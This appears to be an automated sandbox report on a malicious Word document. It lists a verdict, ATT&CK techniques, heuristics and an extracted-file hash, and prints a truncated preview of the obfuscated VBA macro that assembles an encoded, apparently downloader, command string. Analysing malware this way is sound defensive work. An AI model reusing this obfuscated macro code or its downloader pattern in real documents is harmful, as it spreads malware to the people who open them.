Verdict: MALICIOUS
Risk Score: 82

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing a VBA macro. The macro's primary function appears to be constructing and executing a string, likely a command to download and run a second-stage payload. The constructed string is "He ll ( '25X71X91!126!0_83<88q74_16<82{95!87<88{94}73j29T115{88{73{19j106j88{95!126{81{84T88E83j73j6_25X77j77}100j0q26X85T73X73_77_7!18<18_74X74}74T". This behavior is indicative of a downloader or initial access mechanism.
Heuristics (4)

- VBA macros detected (severity: medium; 1 related finding) [OLE_VBA_MACROS]: Document contains VBA macro code.
- VBA p-code auto-exec with execution tokens (severity: high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (severity: medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (severity: info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11182 bytes |

SHA-256: a27c420761b04c40500d14f7b41789fff980fd712513529d25e73151893d6d5f

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "QdITzZNNNA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "rZtivMUjWOuUm"
Function KWACFXA()
On Error Resume Next
nYIJB = (83882 / CBool(13470) + 98870 + CSng(cdFWKo) * (2595 - EIKZj + 85222 - CLng(RNCfob)))
PdGXR = CByte(76300 * Tan(46820) / 63546 + CLng(FYhZZk * 62571 * 26292 * Chr(70360)))
nVbNc = "He" + "ll" + " " + Chr(40) + "'2" + "5X71X91" + "!12" + "6!0" + "_8"
pvjHZG = CByte(78523 * Tan(39880) / 31705 + CLng(SfspiN * 44041 * 96294 * Chr(21647)))
UcIol = (14007 / CBool(61825) + 40818 + CSng(oobKKb) * (27484 - PmXNpX + 59284 - CLng(BwSNj)))
iOZLfOjJ = "3<" + "88" + "q74_16<8" + "2{" + "95" + "!87"
CYPOh = CByte(70879 * Tan(54401) / 38626 + CLng(EjHXLU * 71626 * 80438 * Chr(97572)))
QaNvi = (9820 / CBool(57480) + 70600 + CSng(INHLHz) * (61309 - DCHmuW + 73400 - CLng(JipZnb)))
RkzuSw = "<88{9" + "4}7" + "3j2" + "9T115{88" + "{73{19j1"
aEIYwD = CByte(88035 * Tan(20060) / 12540 + CLng(Gtotma * 60671 * 12472 * Chr(63937)))
TwDVVE = (52486 / CBool(99918) + 41532 + CSng(oLzhsE) * (75270 - kwtbhi + 67068 - CLng(OOkot)))
kiqmLt = "06j88" + "{95" + "!126{81" + "{84T88" + "E83j73j" + "6_" + "25X77j7" + "7}100j0" + "q26X85" + "T73X7" + "3_"
idHzua = CByte(28986 * Tan(32137) / 20952 + CLng(QiVtV * 50113 * 23311 * Chr(447)))
FAprOZ = (74048 / CBool(21171) + 79442 + CSng(Pjhok) * (86200 - TFkwa + 83757 - CLng(UoppY)))
WWDwdWDk = "77_7!18<" + "18_74X" + "74}" + "74T"
KWACFXA = nVbNc + iOZLfOjJ + RkzuSw + kiqmLt + WWDwdWDk
pjinWc = CByte(20295 * Tan(8801) / 30830 + CLng(itlpT * 92334 * 39145 * Chr(29802)))
tBMAz = (90955 / CBool(59062) + 17531 + CSng(WZjwmA) * (57888 - YhtJdI + 16252 - CLng(TPFznu)))
End Function
Function UnZOlR()
On Error Resume Next
iEtzji = CByte(27411 * Tan(88398) / 36264 + CLng(jYqFp * 33882 * 77445 * Chr(92060)))
BiGwQt = (7235 / CBool(39107) + 56981 + CSng(ZLsczu) * (30181 - NHJOc + 57121 - CLng(vOXqzT)))
bJOipIpvYn = "19_94_82" + "T77X" + "73<84!9"
iuvfia = CByte(60761 * Tan(13120) / 92388 + CLng(ctPmi * 5670 * 22903 * Chr(3716)))
nGIZm = (3309 / CBool(55380) + 11648 + CSng(ijddM) * (78105 - nizKhu + 37795 - CLng(AhEnmF)))
NfsYEU = "4{77}82" + "T7" + "7T8" + "8<19" + "{82{79_" + "90" + "E18E10<" + "83_126}1" + "09T10" + "8X79}18" + "T1" + "25"
slJENt = CByte(18608 * Tan(47861) / 73415 + CLng(HGBwQI * 58554 * 63905 * Chr(77410)))
BjokWt = (75161 / CBool(37267) + 47391 + CSng(zpTPh) * (95972 - ihKCIb + 6380 - CLng(FAECW)))
hnZsoWzYXG = "X85_73" + "}7" + "3{77<7!1" + "8{18<7"
OaKNt = CByte(66522 * Tan(21045) / 12623 + CLng(dHtIq * 8419 * 51349 * Chr(87830)))
UirbtH = (72309 / CBool(61785) + 32685 + CSng(iQCaEE) * (18374 - UEZJu + 37358 - CLng(BaEowW)))
THoOoobfzM = "4}88" + "}75j8" + "4T86}19" + "}85q" + "72X1" + "8q82X" + "92!89E86" + "!126E"
zzKbz = CByte(4985 * Tan(19576) / 57689 + CLng(zdVCT * 49264 * 52586 * Chr(72232)))
zTNkV = (20787 / CBool(69342) + 46211 + CSng(rjjrUW) * (21947 - bQrKa + 99725 - CLng(vwBBL)))
istKkK = "76!18" + "E125{8" + "5X73!73T" + "77_" + "7E18" + "E18X87}" + "92q86j88" + "}84}" + "83"
UnZOlR = bJOipIpvYn + NfsYEU + hnZsoWzYXG + THoOoobfzM + istKkK
KOiNR = CByte(39361 * Tan(80028) / 16886 + CLng(ZiKpfq * 90157 * 16781 * Chr(53551)))
WzncJC = (3017 / CBool(46817) + 38063 + CSng(oZJiNa) * (90156 - VQWTBY + 43706 - CLng(NoYjo)))
End Function
Function kcbIwT()
On Error Resume Next
wIvPpz = CByte(53622 * Tan(35026) / 5183 + CLng(zUNYv * 98734 * 41275 * Chr(32164)))
sFVQC = (91883 / CBool(28475) + 11184 + CSng(oMAmLU) * (28661 - DzJarN + 80131 - CLng(lqjrbT)))
sKpVMkj = "T90}" + "81_8" + "8j78j19" + "E94!82<" + "80j" + "18X1" + "06{14q" + "94!74_18" + "}125E85" + "{73T73" + "}7" + "7E7!18_"
NajcWd = CByte(20901 * Tan(90887) / 43773 + CLng(iKMXz * 61351 * 98906 * Chr(63797)))
qJSzAs = (61248 / CBool(36568) + 33880 + CSng(fORVj) * (7145 - PFZzcj + 12871 - CLng(usbYp)))
BKjarMc = "18}74E" + "74{74
```

... (truncated)